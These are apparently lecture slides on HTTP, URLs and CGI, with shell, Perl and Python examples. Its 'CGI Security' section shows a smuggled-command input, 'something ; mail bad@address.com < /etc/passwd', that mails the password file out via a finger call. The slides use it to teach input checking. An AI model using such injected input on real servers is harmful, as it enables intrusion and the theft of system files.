Multimedia Information Systems VO/KU (706.052/706.053)
HTTP and URLs
Denis Helic
IICM, TU Graz
Server-side Technologies: Historical Background (1)
- Server-side = Web server side
- At the beginning the Web was a static information system
- Web servers served documents, images, etc.
- Static information stored on the server side (file system)
- No interaction between users and the Web (except browsing)
Server-side Technologies: Historical Background (2)
- There was a need for more interaction between users and the system (e.g. phone books)
- HTML forms
- Server needed to respond differently depending on values submitted by users
- Dynamic response by server
Server-side Technologies: Historical Background (3)
- Need to extend the functionality of Web servers
- Don't add the new functionality into Web servers directly
- Just allow Web servers to communicate with external programs
- External programs generate dynamic content depending on the values submitted via an HTML form
- Dynamic content forwarded to Web server
- Web server responds with dynamic content
Server-side Technologies: Today
- More than just evaluating HTML forms
- Dynamic content needed for different purposes
- Sophisticated user interaction (e.g. search engines, shopping carts)
- Content changes often (e.g. weather forecast, news headlines)
- Web gateways to database-based applications (e.g. prices of products, online ticket reservations)
HTTP (1)
- Original intention to retrieve and publish hypertext documents
- Development coordinated by the IETF and the W3C
- HTTP is a request/response protocol between a user-agent and a server
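- It is a stateless protocol: each request is handled independently of earlier ones
- In HTTP/1.0 the server closes the connection after the response is sent; HTTP/1.1 keeps it open by default (persistent connections)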
HTTP (2)
- Between a user-agent and a server there can be intermediaries
- Proxies: servers that forward requests from user-agents to other servers
- Gateways (reverse proxies): servers that act as an entry point to a number of servers
- Tunnels: carry HTTP messages within another protocol, e.g. a secure protocol
HTTP (3)
- A server serves a number of Web resources, e.g. HTML pages, images
- Each resource is uniquely addressable by its URL (URI)
- http://coronet.iicm.edu/lectures/mmis/
- HTTP 1.1
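To make the addressing concrete, the following minimal sketch splits the example URL from this slide into its components using Python's standard `urllib.parse` module. The variable names are illustrative only.

```python
from urllib.parse import urlsplit

# URL taken from the slide above
url = "http://coronet.iicm.edu/lectures/mmis/"
parts = urlsplit(url)

print(parts.scheme)    # protocol used to reach the resource
print(parts.hostname)  # server that hosts the resource
print(parts.path)      # location of the resource on that server
```

The host part ends up in the Host header of the request, the path part in the request line.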
HTTP Request Message
- Request line, e.g. GET /lectures/mmis/ HTTP/1.1
- Headers such as: Host, Accept-Language, ...
- An empty line
- Optionally message body
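The four parts listed above can be assembled by hand. The sketch below is a simplified illustration, not a complete HTTP client: `build_request` is a hypothetical helper, and the header values are assumptions chosen for the example.

```python
def build_request(method, path, headers, body=b""):
    """Assemble a raw HTTP/1.1 request message as bytes."""
    # 1. Request line
    lines = [f"{method} {path} HTTP/1.1"]
    # 2. Headers, one per line
    lines += [f"{name}: {value}" for name, value in headers.items()]
    # 3. An empty line ends the header section (lines end with CRLF)
    head = "\r\n".join(lines) + "\r\n\r\n"
    # 4. Optional message body
    return head.encode("ascii") + body


message = build_request(
    "GET",
    "/lectures/mmis/",
    {"Host": "coronet.iicm.edu", "Accept-Language": "en"},
)
print(message.decode("ascii"))
```

A GET request normally has no body, so the message ends right after the empty line.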
HTTP Request Methods (1)
- As of HTTP 1.1: 8 request methods
- HEAD: asks for response identical to GET but without message body
- To retrieve meta-information on the resource
- GET: request for a representation of a resource
- Representation in a particular media format: text/html, image/png, ...
- Should not have side effects; commonly misused to trigger actions in Web applications
HTTP Request Methods (2)
- POST: submits data to the server for processing by a specified resource (e.g. HTML forms)
- Data included and encoded in the message body
- PUT: uploads a representation of a specific resource
- Data in the message body
HTTP Request Methods (3)
- DELETE: deletes a specified resource
- TRACE: echoes the request to see the intermediaries
- OPTIONS: retrieves the methods supported by the server
- CONNECT: converts the connection to a tunnel, typically to facilitate SSL communication (HTTPS)
HTTP Safe Methods
- HEAD, GET, OPTIONS, and TRACE are defined as safe
- These methods should not have side-effects
- They should not change the state of resources on a server
- However, GET is very often misused, e.g. to delete a database record on a server
- POST, PUT, DELETE change the state of resources
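The distinction can be checked mechanically in an application. The following sketch assumes a hypothetical `check_handler` helper that a Web application could call when registering request handlers; it is an illustration, not part of any real framework.

```python
# Methods that HTTP defines as safe (see the list above)
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}


def is_safe(method):
    """Return True if the HTTP method is defined as safe."""
    return method.upper() in SAFE_METHODS


def check_handler(method, changes_state):
    """Return a warning if a safe method is bound to a state-changing action."""
    if is_safe(method) and changes_state:
        return f"warning: {method} is safe but the handler changes state"
    return "ok"


print(check_handler("GET", changes_state=True))     # the misuse described above
print(check_handler("DELETE", changes_state=True))  # fine: DELETE may change state
```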
HTTP Idempotent Methods
- Multiple identical requests must have the same effect as a single request
- GET, HEAD, PUT, DELETE are idempotent
- Idempotence matters because of network problems: a client can safely repeat a request whose response was lost
- Misusing GET to change state can violate the idempotence definition
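A small in-memory model shows the difference between an idempotent and a non-idempotent method. The `Store` class and its paths are hypothetical; it only mimics how a server might react to PUT, DELETE and POST.

```python
class Store:
    """Toy resource store, standing in for the server side."""

    def __init__(self):
        self.resources = {}
        self.next_id = 1

    def put(self, path, data):
        # PUT: the client names the resource, so a repeat overwrites with the same data
        self.resources[path] = data

    def delete(self, path):
        # DELETE: removing an already removed resource changes nothing further
        self.resources.pop(path, None)

    def post(self, collection, data):
        # POST: the server picks a new name each time, so a repeat adds a duplicate
        path = f"{collection}/{self.next_id}"
        self.next_id += 1
        self.resources[path] = data
        return path


store = Store()
store.put("/notes/a", "hello")
store.put("/notes/a", "hello")      # retry after a lost response
after_put = dict(store.resources)   # still exactly one resource

store.post("/notes", "hello")
store.post("/notes", "hello")       # the same retry now creates a second entry
print(len(after_put), len(store.resources))
```

Repeating the PUT leaves the store unchanged, while repeating the POST does not, which is why a client may retry the former automatically but not the latter.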
HTTP Headers

HTTP Response (1)
- The first line of the response is the status line (protocol version, status code, reason phrase)
- Headers (metadata that helps the client handle the response)
- Message body (representation of a resource)
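The three parts of a response can be separated with a few lines of code. This is a simplified sketch: `parse_response` is a hypothetical helper that assumes a well-formed message with a reason phrase and ignores details such as repeated headers or chunked bodies. The sample bytes are made up for the example.

```python
def parse_response(raw):
    """Split a raw HTTP response into status line fields, headers and body."""
    # The first empty line separates the head from the message body
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")

    # Status line: protocol version, status code, reason phrase
    version, code, reason = lines[0].split(" ", 2)

    # Header lines: "Name: value" (names are case-insensitive)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    return version, int(code), reason, headers, body


raw = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 13\r\n"
    b"\r\n"
    b"<html></html>"
)
version, code, reason, headers, body = parse_response(raw)
print(version, code, reason, headers["content-type"], len(body))
```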
HTTP Response (2)

HTTP Request/Response: Example (1)
telnet coronet.iicm.edu 80
Trying 129.27.200.61...
Connected to coronet.iicm.edu (129.27.200.61).
Escape character is '^]'.
GET / HTTP/1.1
Host: coronet.iicm.tugraz.at
HTTP Request/Response: Example (2)
HTTP/1.1 200 OK
ETag: W/"413-1160316312000"
Last-Modified: Sun, 08 Oct 2006 14:05:12 GMT
Content-Type: text/html
Content-Length: 413
Date: Mon, 12 Nov 2007 11:08:09 GMT
Server: Apache-Coyote/1.1
<html>
...
HTTP Request/Response: Example (3)
curl -x proxy.iicm.edu:3128 http://coronet.iicm.tugraz.at -i -X TRACE
HTTP/1.0 200 OK
Content-Type: message/http
Content-Length: 322
Date: Mon, 12 Nov 2007 11:10:37 GMT
Server: Apache-Coyote/1.1
X-Cache: MISS from gk01.iicm.tugraz.at
X-Cache-Lookup: NONE from gk01.iicm.tugraz.at:3128
Proxy-Connection: keep-alive
HTTP Request/Response: Example (4)
TRACE / HTTP/1.0
user-agent: curl/7.16.4 (i486-pc-linux-gnu) libcurl/7.16.4 OpenSSL/0.9.8e zlib/1.2.3.3 libidn/1.0
host: coronet.iicm.tugraz.at
pragma: no-cache
accept: */*
via: 1.1 gk01.iicm.tugraz.at:3128 (squid/2.5.STABLE14)
x-forwarded-for: 129.27.153.250
cache-control: max-age=259200
connection: keep-alive
HTTP Request/Response: Example (5)
curl -x proxy.iicm.edu:3128 http://coronet.iicm.tugraz.at -i -X OPTIONS
HTTP/1.0 200 OK
Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
Content-Length: 0
Date: Mon, 12 Nov 2007 11:12:26 GMT
Server: Apache-Coyote/1.1
X-Cache: MISS from gk01.iicm.tugraz.at
X-Cache-Lookup: MISS from gk01.iicm.tugraz.at:3128
Proxy-Connection: keep-alive
URLs (1)
- URL is the address of a resource
- The core concept of the Web
- URLs interconnect all the resources into the Web
- The Web succeeded because of this addressability
URLs (2)
- People will use URLs
- To make links (recall that Google also relies on links)
- URLs should be descriptive
- http://www.example.com/software/releases/1.0.3.tar.gz
- As opposed to: http://www.dinf.tugraz.at/index.php?id=122 (Masterprüfungen, i.e. master's examinations)
URLs (3)
- URLs should have a structure
- /search/Jellyfish and /i-want-to-know-about/Mice
- Choose one of these and be consistent
- Impose a structure as e.g. in a file system
- As opposed to: http://www.dinf.tugraz.at/index.php?id=122 (Masterprüfungen, i.e. master's examinations)
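One way to keep URLs consistent is to build them from path segments in a single place. The sketch below assumes a hypothetical `resource_url` helper; the base address and segments are examples only.

```python
from urllib.parse import quote


def resource_url(base, *segments):
    """Build a hierarchical URL from path segments, as in a file system."""
    # Percent-encode each segment so that spaces or slashes inside a name
    # cannot break the structure
    path = "/".join(quote(str(segment), safe="") for segment in segments)
    return base.rstrip("/") + "/" + path


print(resource_url("http://www.example.com", "software", "releases", "1.0.3.tar.gz"))
print(resource_url("http://www.example.com", "search", "Jellyfish"))
```

Because every URL goes through the same function, the scheme chosen once (e.g. /search/...) is applied everywhere.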
Communication between Web server and external programs
- How should Web server communicate with external programs?
- Passing parameters, getting response, etc.
- Standardized communication mechanism
- Standard originally specified at NCSA (later documented in RFC 3875)
Common Gateway Interface (CGI)
- CGI is a specification of communication between Web server and external programs
- Current version CGI 1.1: http://hoohoo.ncsa.uiuc.edu/cgi/interface.html
- Very general approach, can be applied to different applications
- Not only HTML form evaluation
- Web server must implement CGI specification
- All major Web servers do! (e.g. Apache, IIS, etc.)
CGI Specification (1)
- Environment variables
- System specific variables set by Web server
- External program reads environment variables and obtains data about client request
- CONTENT_LENGTH, CONTENT_TYPE, REMOTE_ADDR, REMOTE_HOST, etc.
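As an illustration, an external program could read these variables as follows. This is a minimal sketch of a CGI program in Python; the function names are hypothetical, and REQUEST_METHOD is added to the variables listed above because it is also part of CGI 1.1.

```python
import os

# Environment variables set by the Web server before it starts the program
CGI_VARIABLES = [
    "REQUEST_METHOD",
    "CONTENT_LENGTH",
    "CONTENT_TYPE",
    "REMOTE_ADDR",
    "REMOTE_HOST",
]


def describe_request(environ):
    """Collect the CGI variables; unset ones become empty strings."""
    return {name: environ.get(name, "") for name in CGI_VARIABLES}


def render(environ):
    """Produce the CGI response: header, empty line, then plain-text content."""
    lines = ["Content-Type: text/plain", ""]
    for name, value in describe_request(environ).items():
        lines.append(f"{name}={value}")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # When started by a Web server, os.environ holds the request data
    print(render(os.environ), end="")
```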
CGI Specification (2)
- Command line
- Using a special HTML tag (ISINDEX) the user sends a command line to the server
- Command line executed on the server
CGI Specification (3)
- Standard Input
- Used by the server to send client data to external program
- Standard Output
- Used by external program to send response to the server (write HTML to standard output)
CGI Specification (4)
- HTTP method used by the client: GET or POST
- GET method: external program reads environment variables
- QUERY_STRING: special environment variable containing the data submitted by the user (e.g. HTML form data)
- POST method: external program reads from standard input
- External program needs to parse the input
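The two cases can be handled in one function. The sketch below is an assumption about how an external program might be organised: `read_form_data` is a hypothetical helper that takes the environment and the input stream as parameters so that it can be tried without a Web server, and it assumes form data in the usual URL-encoded format.

```python
import io
from urllib.parse import parse_qs


def read_form_data(environ, stdin):
    """Return submitted form fields as a dict mapping names to lists of values."""
    method = environ.get("REQUEST_METHOD", "GET").upper()
    if method == "POST":
        # POST: the data arrives on standard input; CONTENT_LENGTH gives its size
        length = int(environ.get("CONTENT_LENGTH") or 0)
        raw = stdin.read(length).decode("ascii")
    else:
        # GET: the data arrives in the QUERY_STRING environment variable
        raw = environ.get("QUERY_STRING", "")
    # Parse "name=value&name=value" pairs and undo the URL encoding
    return parse_qs(raw)


get_data = read_form_data(
    {"REQUEST_METHOD": "GET", "QUERY_STRING": "myfield=hello+world"},
    io.BytesIO(),
)
post_data = read_form_data(
    {"REQUEST_METHOD": "POST", "CONTENT_LENGTH": "11"},
    io.BytesIO(b"myfield=abc"),
)
print(get_data, post_data)
```

Under a real Web server the function would be called with `os.environ` and `sys.stdin.buffer` instead of the sample values.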
CGI Specification (5)
- CGI specification allows external programs to be written in any programming language
- UNIX shell scripts, Perl scripts, C programs, C++ programs
- Even PHP as CGI or Java as CGI
CGI Examples (2)
#!/bin/sh
# send http-header and a newline afterwards:
echo "Content-Type: text/html"
echo ""
CGI Examples (3)
# send html content:
echo "<HTML>"
echo " <HEAD>"
echo " <TITLE>Hello World CGI</TITLE>"
echo " </HEAD>"
echo " <BODY>"
echo " Hello World ("
date "+%T, %d.%m.%Y"
echo ")"
echo " </BODY>"
echo "</HTML>"
CGI Examples (5)
#!/usr/bin/perl
require "cgi-lib.pl";
print &PrintHeader;
print "<hr>";
print &PrintEnv;
CGI Examples (6)
- Special CGI library in Perl: cgi-lib
- Provides functions for parsing input, parsing parameters, writing headers, etc.
- Cgi-lib homepage: http://cgi-lib.berkeley.edu/
CGI Examples (9)
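#!/usr/bin/perl
require "cgi-lib.pl";
# ReadParse returns true if form data was submitted
if (&ReadParse) {
  # Echo the submitted variables back to the user
  print &PrintHeader, &PrintVariables;
} else {
  # No data yet: send the form
  print &PrintHeader, '<form><input type="submit">
  Data: <input name="myfield"></form>';
}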
CGI Applications (1)
- Long list of different applications
- Simple: Hit counters, current date, etc.
- Handling HTML forms, search engines, imagemaps, databases
- WWW gateways!
CGI Security (1)
- Check parameters carefully!!!
if($email =~ /[^a-zA-Z0-9_\-\.@]/){
$_ = "The email address should be of
the form <i>user\@server</i>!";
}else{
$_ = qx($finger $email);
}
CGI Security (2)
- Suppose this e-mail address is submitted and passed on unchecked: something ; mail bad@address.com < /etc/passwd
- Basically you let other people start programs on the server
- Check what they want to do on your server!!!
- Not only CGI! (PHP, Java Servlets, etc.)
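The same check can be sketched in Python. This is one possible approach under stated assumptions, not the method from the slides: the allowed character set is a deliberate simplification of real e-mail syntax, `finger_command` and `run_finger` are hypothetical helpers, and the program is started from an argument list so that no shell ever interprets the user input.

```python
import re
import subprocess

# Allow-list: letters, digits, "_", "." and "-" around a single "@";
# each part must start with a letter or digit so it cannot look like an option
ALLOWED = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.\-]*@[A-Za-z0-9][A-Za-z0-9_.\-]*")


def is_valid_address(value):
    """Accept only addresses made up entirely of allowed characters."""
    return ALLOWED.fullmatch(value) is not None


def finger_command(address):
    """Build the argument list for finger, rejecting suspicious input."""
    if not is_valid_address(address):
        raise ValueError("address should be of the form user@server")
    # A list of arguments is passed to the program directly, without a shell,
    # so characters such as ";" or "<" have no special meaning
    return ["finger", address]


def run_finger(address):
    """Run finger for a checked address and return its output."""
    result = subprocess.run(
        finger_command(address), capture_output=True, text=True, check=False
    )
    return result.stdout


print(is_valid_address("user@server.example"))
print(is_valid_address("something ; mail bad@address.com < /etc/passwd"))
```

Checking the input and avoiding the shell are independent safeguards; using both means that a gap in one does not immediately lead to command execution.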